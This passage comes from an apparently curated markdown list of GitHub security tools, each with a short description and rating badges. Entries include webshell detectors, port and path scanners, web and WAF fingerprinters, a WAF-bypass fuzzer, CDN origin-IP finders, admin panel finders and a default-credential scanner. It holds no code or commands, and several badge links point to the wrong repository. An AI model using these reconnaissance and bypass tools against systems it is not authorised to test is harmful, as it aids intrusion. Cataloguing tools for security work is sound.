![GitHub](https://img.shields.io/github/license/SAP/credential-digger?style=flat-square)\n\n- https://github.com/sdushantha/dora - **Find exposed API keys based on RegEx and get exploitation methods for some of keys that are found**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/sdushantha/dora?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/sdushantha/dora?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/sdushantha/dora?style=flat-square) ![GitHub](https://img.shields.io/github/license/sdushantha/dora?style=flat-square)\n\n\n### Malicious Scripts Detection\n\n- https://github.com/he1m4n6a/findWebshell - **Simple webshell detector**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/he1m4n6a/findWebshell?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/he1m4n6a/findWebshell?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/he1m4n6a/findWebshell?style=flat-square) ![GitHub](https://img.shields.io/github/license/he1m4n6a/findWebshell?style=flat-square)\n\n- https://github.com/nbs-system/php-malware-finder - **An awesome tool to detect potentially malicious PHP files**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/nbs-system/php-malware-finder?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/nbs-system/php-malware-finder?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/nbs-system/php-malware-finder?style=flat-square) ![GitHub](https://img.shields.io/github/license/nbs-system/php-malware-finder?style=flat-square)\n\n- https://github.com/emposha/PHP-Shell-Detector - **Helps you find and identify PHP/Perl/Asp/Aspx shells**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/emposha/PHP-Shell-Detector?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/emposha/PHP-Shell-Detector?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/emposha/PHP-Shell-Detector?style=flat-square) ![GitHub](https://img.shields.io/github/license/emposha/PHP-Shell-Detector?style=flat-square)\n\n- https://github.com/erevus-cn/scan_webshell - **Simple webshell detector**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/erevus-cn/scan_webshell?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/erevus-cn/scan_webshell?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/erevus-cn/scan_webshell?style=flat-square) ![GitHub](https://img.shields.io/github/license/erevus-cn/scan_webshell?style=flat-square)\n\n- https://github.com/emposha/Shell-Detector - **A application that helps you find and identify PHP/Perl/Asp/Aspx shells**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/emposha/Shell-Detector?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/emposha/Shell-Detector?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/emposha/Shell-Detector?style=flat-square) ![GitHub](https://img.shields.io/github/license/emposha/Shell-Detector?style=flat-square)\n\n\n### Vulnerability Assessment for Middleware\n\n- https://github.com/ring04h/wyportmap - **Target port scanning + system service fingerprint recognition**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ring04h/wyportmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ring04h/wyportmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ring04h/wyportmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/ring04h/wyportmap?style=flat-square)\n\n- https://github.com/ring04h/weakfilescan - **Dynamic multi - thread sensitive information leak detection tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ring04h/wyportmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ring04h/wyportmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ring04h/wyportmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/ring04h/wyportmap?style=flat-square)\n\n- https://github.com/EnableSecurity/wafw00f - **Identify and fingerprint Web Application Firewall**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ring04h/weakfilescan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ring04h/weakfilescan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ring04h/weakfilescan?style=flat-square) ![GitHub](https://img.shields.io/github/license/ring04h/weakfilescan?style=flat-square)\n\n- https://github.com/rbsec/sslscan - **Tests SSL/TLS enabled services to discover supported cipher suites**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-C-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rbsec/sslscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rbsec/sslscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rbsec/sslscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/rbsec/sslscan?style=flat-square)\n\n- https://github.com/TideSec/TideFinger - **Web fingerprint identification tool, more fingerprint database, more detection methods**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/TideFinger?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/TideFinger?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/TideFinger?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/TideFinger?style=flat-square)\n\n- https://github.com/TideSec/FuzzScanner - **Comprehensive web information collection platform, easy to deploy, versatile and practical**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/FuzzScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/FuzzScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/FuzzScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/FuzzScanner?style=flat-square)\n\n- https://github.com/urbanadventurer/whatweb - **Website fingerprinter**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/urbanadventurer/whatweb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/urbanadventurer/whatweb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/urbanadventurer/whatweb?style=flat-square) ![GitHub](https://img.shields.io/github/license/urbanadventurer/whatweb?style=flat-square)\n\n- https://github.com/tanjiti/FingerPrint - **Another website fingerprinter**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/tanjiti/FingerPrint?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/tanjiti/FingerPrint?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/tanjiti/FingerPrint?style=flat-square) ![GitHub](https://img.shields.io/github/license/tanjiti/FingerPrint?style=flat-square)\n\n- https://github.com/nanshihui/Scan-T - **A new spider based on Python with more function including Network fingerprint search**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/nanshihui/Scan-T?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/nanshihui/Scan-T?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/nanshihui/Scan-T?style=flat-square) ![GitHub](https://img.shields.io/github/license/nanshihui/Scan-T?style=flat-square)\n\n- https://github.com/OffensivePython/Nscan - **Fast internet-wide scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OffensivePython/Nscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OffensivePython/Nscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OffensivePython/Nscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/OffensivePython/Nscan?style=flat-square)\n\n- https://github.com/ywolf/F-NAScan - **Scanning a network asset information script**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ywolf/F-NAScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ywolf/F-NAScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ywolf/F-NAScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/ywolf/F-NAScan?style=flat-square)\n\n- https://github.com/maurosoria/dirsearch - **Web path scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/maurosoria/dirsearch?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/maurosoria/dirsearch?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/maurosoria/dirsearch?style=flat-square) ![GitHub](https://img.shields.io/github/license/maurosoria/dirsearch?style=flat-square)\n\n- https://github.com/x0day/bannerscan - **C-segment Banner with path scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/x0day/bannerscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/x0day/bannerscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/x0day/bannerscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/x0day/bannerscan?style=flat-square)\n\n- https://github.com/RASSec/RASscan - **Internal network port service scanners**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/RASSec/RASscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/RASSec/RASscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/RASSec/RASscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/RASSec/RASscan?style=flat-square)\n\n- https://github.com/3xp10it/bypass_waf - **Automatic WAF Bypass Fuzzing Tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/3xp10it/bypass_waf?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/3xp10it/bypass_waf?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/3xp10it/bypass_waf?style=flat-square) ![GitHub](https://img.shields.io/github/license/3xp10it/bypass_waf?style=flat-square)\n\n- https://github.com/3xp10it/xcdn - **Try to find out the actual ip behind cdn**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/3xp10it/xcdn?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/3xp10it/xcdn?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/3xp10it/xcdn?style=flat-square) ![GitHub](https://img.shields.io/github/license/3xp10it/xcdn?style=flat-square)\n\n- https://github.com/Xyntax/BingC - **Based on the Bing search engine C / side-stop query, multi-threaded, supported API**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Xyntax/BingC?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Xyntax/BingC?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Xyntax/BingC?style=flat-square) ![GitHub](https://img.shields.io/github/license/Xyntax/BingC?style=flat-square)\n\n- https://github.com/Xyntax/DirBrute - **Multi-thread web directory enumerating tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Xyntax/DirBrute?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Xyntax/DirBrute?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Xyntax/DirBrute?style=flat-square) ![GitHub](https://img.shields.io/github/license/Xyntax/DirBrute?style=flat-square)\n\n- https://github.com/zer0h/httpscan - **A HTTP service detector with a crawler from IP/CIDR**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zer0h/httpscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zer0h/httpscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zer0h/httpscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/zer0h/httpscan?style=flat-square)\n\n- https://github.com/lietdai/doom - **Distributed task distribution of the IP port vulnerability scanner based on thorn**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lietdai/doom?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lietdai/doom?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lietdai/doom?style=flat-square) ![GitHub](https://img.shields.io/github/license/lietdai/doom?style=flat-square)\n\n- https://github.com/chichou/grab.js - **Fast TCP banner grabbing like zgrab, but supports much more protocol**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chichou/grab.js?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chichou/grab.js?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chichou/grab.js?style=flat-square) ![GitHub](https://img.shields.io/github/license/chichou/grab.js?style=flat-square)\n\n- https://github.com/Nitr4x/whichCDN - **Detect if a given website is protected by a CDN**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Nitr4x/whichCDN?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Nitr4x/whichCDN?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Nitr4x/whichCDN?style=flat-square) ![GitHub](https://img.shields.io/github/license/Nitr4x/whichCDN?style=flat-square)\n\n- https://github.com/secfree/bcrpscan - **Base on crawler result web path scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/secfree/bcrpscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/secfree/bcrpscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/secfree/bcrpscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/secfree/bcrpscan?style=flat-square)\n\n- https://github.com/mozilla/ssh_scan - **A prototype SSH configuration and policy scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mozilla/ssh_scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mozilla/ssh_scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mozilla/ssh_scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/mozilla/ssh_scan?style=flat-square)\n\n- https://github.com/18F/domain-scan - **Scans domains for data on their HTTPS configuration and assorted other things**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/18F/domain-scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/18F/domain-scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/18F/domain-scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/18F/domain-scan?style=flat-square)\n\n- https://github.com/ggusoft/inforfinder - **A tool made to collect information of any domain pointing at a server and fingerprinter**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ggusoft/inforfinder?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ggusoft/inforfinder?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ggusoft/inforfinder?style=flat-square) ![GitHub](https://img.shields.io/github/license/ggusoft/inforfinder?style=flat-square)\n\n- https://github.com/boy-hack/gwhatweb - **Fingerprinter for CMS**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/boy-hack/gwhatweb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/boy-hack/gwhatweb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/boy-hack/gwhatweb?style=flat-square) ![GitHub](https://img.shields.io/github/license/boy-hack/gwhatweb?style=flat-square)\n\n- https://github.com/Mosuan/FileScan - **Sensitive files scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Mosuan/FileScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Mosuan/FileScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Mosuan/FileScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/Mosuan/FileScan?style=flat-square)\n\n- https://github.com/Xyntax/FileSensor - **Dynamic file detection tool based on crawler**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Xyntax/FileSensor?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Xyntax/FileSensor?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Xyntax/FileSensor?style=flat-square) ![GitHub](https://img.shields.io/github/license/Xyntax/FileSensor?style=flat-square)\n\n- https://github.com/deibit/cansina - **Web content discovery tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/deibit/cansina?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/deibit/cansina?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/deibit/cansina?style=flat-square) ![GitHub](https://img.shields.io/github/license/deibit/cansina?style=flat-square)\n\n- https://github.com/mozilla/cipherscan - **A very simple way to find out which SSL ciphersuites are supported by a target**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mozilla/cipherscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mozilla/cipherscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mozilla/cipherscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/mozilla/cipherscan?style=flat-square)\n\n- https://github.com/xmendez/wfuzz - **Web application framework and web content scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/xmendez/wfuzz?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/xmendez/wfuzz?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/xmendez/wfuzz?style=flat-square) ![GitHub](https://img.shields.io/github/license/xmendez/wfuzz?style=flat-square)\n\n- https://github.com/s0md3v/Breacher - **An advanced multithreaded admin panel finder written in Python**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/Breacher?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/Breacher?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/Breacher?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/Breacher?style=flat-square)\n\n- https://github.com/ztgrace/changeme - **A default credential scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ztgrace/changeme?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ztgrace/changeme?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ztgrace/changeme?style=flat-square) ![GitHub](https://img.shields.io/github/license/ztgrace/changeme?style=flat-square)\n\n- https://github.com/medbenali/CyberScan - **An open source penetration testing tool that can analyse packets,decoding,scanning ports, pinging and geolocation of an IP**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/medbenali/CyberScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/medbenali/CyberScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/medbenali/CyberScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/medbenali/CyberScan?style=flat-square)\n\n- https://github.com/m0nad/HellRaiser - **HellRaiser scan with nmap then correlates cpe's found with cve-search to enumerate vulnerabilities**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m0nad/HellRaiser?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m0nad/HellRaiser?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m0nad/HellRaiser?style=flat-square) ![GitHub](https://img.shields.io/github/license/m0nad/HellRaiser?style=flat-square)\n\n- https://github.com/scipag/vulscan - **Advanced vulnerability scanning with Nmap NSE**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-NSE-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/scipag/vulscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/scipag/vulscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/scipag/vulscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/scipag/vulscan?style=flat-square)\n\n- https://github.com/jekyc/wig - **WebApp information gatherer**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jekyc/wig?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jekyc/wig?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jekyc/wig?style=flat-square) ![GitHub](https://img.shields.io/github/license/jekyc/wig?style=flat-square)\n\n- https://github.com/eldraco/domain_analyzer - **Analyze the security of any domain by finding all the information possible**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/eldraco/domain_analyzer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/eldraco/domain_analyzer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/eldraco/domain_analyzer?style=flat-square) ![GitHub](https://img.shields.io/github/license/eldraco/domain_analyzer?style=flat-square)\n\n- https://github.com/cloudtracer/paskto - **Passive directory scanner and web crawler based on Nikto DB**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cloudtracer/paskto?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cloudtracer/paskto?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cloudtracer/paskto?style=flat-square) ![GitHub](https://img.shields.io/github/license/cloudtracer/paskto?style=flat-square)\n\n- https://github.com/zerokeeper/WebEye - **A web service and WAF fingerprinter**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zerokeeper/WebEye?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zerokeeper/WebEye?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zerokeeper/WebEye?style=flat-square) ![GitHub](https://img.shields.io/github/license/zerokeeper/WebEye?style=flat-square)\n\n- https://github.com/m3liot/shcheck - **Just check security headers on a target website**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m3liot/shcheck?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m3liot/shcheck?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m3liot/shcheck?style=flat-square) ![GitHub](https://img.shields.io/github/license/m3liot/shcheck?style=flat-square)\n\n- https://github.com/aipengjie/sensitivefilescan - **A speed and awesome sensitive files scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/aipengjie/sensitivefilescan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/aipengjie/sensitivefilescan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/aipengjie/sensitivefilescan?style=flat-square) ![GitHub](https://img.shields.io/github/license/aipengjie/sensitivefilescan?style=flat-square)\n\n- https://github.com/fnk0c/cangibrina - **A fast and powerfull dashboard (admin) finder**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) 